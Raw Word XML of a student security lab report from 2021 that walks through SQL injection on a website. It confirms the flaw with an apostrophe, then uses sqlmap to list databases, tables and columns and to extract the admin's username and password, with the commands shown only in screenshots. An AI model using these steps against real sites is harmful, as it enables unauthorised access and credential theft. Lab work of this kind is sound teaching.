        <w:t xml:space="preserve">(Students must submit the soft copy as per the following segments within two hours of the practical. The soft copy must be uploaded on the Blackboard or emailed to the concerned lab in charge faculties at the end of the practical in case there is no Blackboard access available)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="9062.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07"/>
        <w:gridCol w:w="4755"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4307"/>
            <w:gridCol w:w="4755"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
            <w:pPr>
              <w:spacing w:after="0"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Roll No. </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
            <w:pPr>
              <w:spacing w:after="0"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Name: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AMEY THAKUR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
            <w:pPr>
              <w:spacing w:after="0"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Class: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Comps TE B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
            <w:pPr>
              <w:spacing w:after="0"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Batch: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">B3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
            <w:pPr>
              <w:spacing w:after="0"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Date of Experiment: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20/04/2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
            <w:pPr>
              <w:spacing w:after="0"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Date of Submission: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20/04/2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
            <w:pPr>
              <w:spacing w:after="0"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Grade:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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B.1 Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(add a snapshot of output )</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pick a vulnerable website you can perform SQL injection on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>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279541" cy="3967169"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10"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279541" cy="396716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9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:left="3.300018310546875" w:right="313.27880859375" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To confirm the vulnerability, add an apostrophe sign at the end of the link. As we see the warning is coming from the web server, hence it is vulnerable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:left="3.300018310546875" w:right="313.27880859375"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3B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:left="3.300018310546875" w:right="313.27880859375" w:firstLine="0"/>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943600" cy="4305300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4305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C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:left="3.300018310546875" w:right="313.27880859375"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3D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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3E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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3F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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40">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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42">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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43">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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44">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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45">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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46">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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47">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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48">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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49">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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4A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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4B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="57.293701171875"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4C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="57.293701171875" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the kernel and run the following command to target the website using ‘SQLMAP’, an inbuilt software in the Linux operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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943600" cy="3175000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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3175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widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="264.3717384338379" w:lineRule="auto"/>
        <w:ind w:right="57.293701171875" w:firstLine="9.2401123046875"/>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943600" cy="4330700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8"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4330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widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Here we retrieve information about available databases. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875"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52">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875" w:firstLine="0"/>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943600" cy="4318000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9"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4318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3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875" w:firstLine="0"/>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54">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55">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56">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57">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58">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59">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5A">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5B">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5C">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5D">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5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 5: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the next command to gain further information about the tables inside the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875" w:firstLine="0"/>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898299" cy="3206011"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="25169" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5898299" cy="320601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0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875" w:firstLine="0"/>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886843" cy="4258333"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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886843" cy="425833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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 6:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Observing the tables we can identify that the “users” table must have useful information. The next query will give us details about the columns in the user’s table. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>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495925" cy="3244582"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="18465" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495925" cy="324458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601240" cy="4058041"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16"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601240" cy="405804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4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 7: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can get the username and password from the tables mentioned “uname” and “pass” respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>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943600" cy="2829773"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="34089" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="282977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943600" cy="4292600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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4292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7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 8:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Here we successfully managed to get the username and password of the admin from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>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943600" cy="2810723"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="34570" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
